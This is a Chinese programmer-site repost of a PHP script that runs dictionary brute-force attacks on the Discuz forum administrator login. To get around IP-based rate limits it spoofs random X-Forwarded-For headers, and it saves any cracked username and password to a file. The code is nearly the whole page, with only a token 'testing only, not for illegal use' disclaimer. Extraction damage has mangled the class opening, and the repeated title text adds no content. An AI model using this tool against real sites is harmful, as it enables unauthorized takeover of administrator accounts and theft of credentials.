欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  php教程

爆破DIscuz后台的代码,可突破ip限制

程序员文章站 2022-05-11 18:21:23
...

自己写的,爆破discuz后台的,基于字典的,仅供测试。勿用于非法用途 PHP ?php/**Author : fengxuanDate : 2014-11-23 */class FuckDiscuz{public $userfile;public $passfile;public $outfile;public $url;public function __construct($argv,$argc){$this-i

自己写的,爆破discuz后台的,基于字典的,仅供测试。勿用于非法用途 PHP
init($argv,$argc);
		$this->crack();
	}
	
	
	
	private function init($argv,$argc){
		if(!isset($argv) ||  $argc != 7 || $argv[1]!='-v' || $argv[2]!='-o' ) 	$this->show();
		$this->userfile = $argv[count($argv)-2];
		$this->passfile = $argv[count($argv)-1];
		$this->outfile  = $argv[3];
		$this->url = $argv[count($argv)-3];
	}
	

	
	private function sock_post($url,$query){
		$info = parse_url($url);
		$fp = fsockopen($info['host'],80,$error,$errstr,30);
		$head = "POST  ".$info['path']." HTTP/1.0\r\n";
		$head .= "HOST: ".$info['host']."\r\n";
		$head .= "X-Forwarded-For:  ".$this->X_Forwarded_for()."\r\n";
		$head .="Content-type: application/x-www-form-urlencoded\r\n";
		$head .= "Content-Length: ".strlen(trim($query))."\r\n";
		$head .= "\r\n";
		$head .= trim($query);
		$write = fputs($fp, $head);
		while (!feof($fp)){
			$line = fgets($fp);
			if(preg_match('/HTTP\/1.1 302/i', $line)){
			     $temp = 	explode('&', $query);
			     $temp[0] = substr(strstr($temp[0], '='), 1);
			     $temp[1] = substr(strstr($temp[1], '='), 1);
				echo "\r\n\r\nCongratulations! \r\nThe username is \r\n".$temp[0]."  and password is \r\n".$temp[1]."\r\n";
				$this->savefile($this->outfile, $temp[0] , $temp[1] );
				
			}
			//echo $line."
"; } } private function X_Forwarded_for(){ $xip = rand(1, 255).".".rand(0, 255).".".rand(0, 255).".".rand(1, 254); if (preg_match('#^(10|172\.16|192\.168)\.#', $xip)) { continue; } return $xip; } private function savefile($file,$user,$pass){ $fp = fopen($file, 'w+'); $string = "username ".$user." password ".$pass."\r\n"; fwrite($fp, $string); fclose($fp); } private function crack(){ $userfile = file($this->userfile); $passfile = file($this->passfile); $userarr = array(); $passarr = array(); foreach ($userfile as $user=>$value){ $userarr[$user] = $value; foreach ($passfile as $pass=>$value){ $passarr[$pass] = $value; $data = array( 'admin_username'=>$userarr[$user], 'admin_password'=>$passarr[$pass], 'submit'=>'提交' ); print "Try crack with: \t".$userarr[$user]." and \t".$passarr[$pass]." \r\n"; $data = str_replace('%0D%0A', '',http_build_query($data)); $this->sock_post($this->url, $data); } } } private function show(){ $string = -v : According to cracking process -o [file] : The output file to save eg: php.exe fuckdz.php -v -o result.txt http://www.xxx.com/admin.php user.txt pass.txt eof; print $string; exit(); } } new FuckDiscuz($argv,$argc); ?>
爆破DIscuz后台的代码,可突破ip限制爆破DIscuz后台的代码,可突破ip限制爆破DIscuz后台的代码,可突破ip限制爆破DIscuz后台的代码,可突破ip限制